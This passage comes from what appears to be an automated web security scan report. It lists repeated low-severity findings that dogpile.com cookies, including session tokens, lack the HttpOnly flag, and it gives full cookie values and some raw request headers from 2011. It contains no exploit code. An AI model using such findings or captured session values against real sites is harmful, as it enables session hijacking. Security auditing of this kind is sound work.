7.15. http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile/ws/about/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=f4a5e3c498ee4fafa621c16a3af0cb01&ActionId=bfbe830ac1c64c0a810fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:24 GMT; path=/
DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:24 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:24 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.16. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile/ws/contactUs/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=effaa55f51f3463da4cac16a3af0cb01&ActionId=51412009a454492dac79c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:32:53 GMT; path=/
DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:12:53 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:12:53 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.17. http://www.dogpile.com/dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=e0a2585a54c44613a05fc16a3af0cb01&ActionId=ba008f1978f546de8f2dc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:31 GMT; path=/
DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:31 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:31 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.18. http://www.dogpile.com/dogpile/ws/faq/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile/ws/faq/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=a7a7c2c92e274276a8b4c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:25 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:25 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:25 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile/ws/faq/ HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.19. http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=530d17a155f848679bfdc16a3af0cb01&ActionId=f1bd779c38af4c89afa5c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:20 GMT; path=/
DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:20 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:20 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.20. http://www.dogpile.com/dogpile/ws/redir/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile/ws/redir/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=367df53625864920a346c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:46 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:46 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:46 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile/ws/redir/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.21. http://www.dogpile.com/dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=2f68f4b83d774f748c89c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:42 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:42 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:42 GMT; path=/
wsTemp=bigIP+3758658826.20480.0000+cacheId+ms18:1301677062725; path=/
wsRecent=april+fools+day+pranks,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.22. http://www.dogpile.com/dogpile_other/ws/about/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/about/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=c7d0fe76335d40769068c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:05 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:05 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/about/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.23. http://www.dogpile.com/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=0d323fe3be73453a893dc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:24 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:24 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:24 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.24. http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=7bf15bbd815545118e35c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:26 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:26 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:26 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.25. http://www.dogpile.com/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=d276184e64f54d5b98bfc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:33 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:33 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:33 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.26. http://www.dogpile.com/dogpile_other/ws/bookmark/bwr=ffchrm/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/bookmark/bwr=ffchrm/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=6f001cc080a04397bd88c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:15 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:15 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:15 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.27. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=ddb977a118474d1b9a72c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:09 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:09 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:09 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.28. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=3d97c313d94145899eeac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:15 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:15 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:15 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.29. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=6bbbb232f4e94914b016c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:54 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:54 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:54 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.30. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=f85c1be494fd483ab40dc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:08 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:08 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:08 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.31. http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=6ed1b194da28448c8f14c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:06 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:06 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:06 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

7.32. http://www.dogpile.com/dogpile_other/ws/categories/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/categories/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=670b820e86e94451af97c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:50 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:50 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:50 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/categories/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.33. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=fabc047e90564b3caea8c16a3af0cb01&ActionId=c6139e801eee4175a160c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:15 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:15 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:15 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=859dec9ca7a74a60921ac16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:52 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

7.34. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=302e17dfa32741629beac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:30 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:30 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:30 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.35. http://www.dogpile.com/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=8d4c05bb90314dba98a5c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:32 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:32 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:32 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.36. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=5b79a7352bbb4726a052c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:31 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:31 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:31 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.37. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=8e6e2554f391469f90c0c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:29 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:29 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:29 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.38. http://www.dogpile.com/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

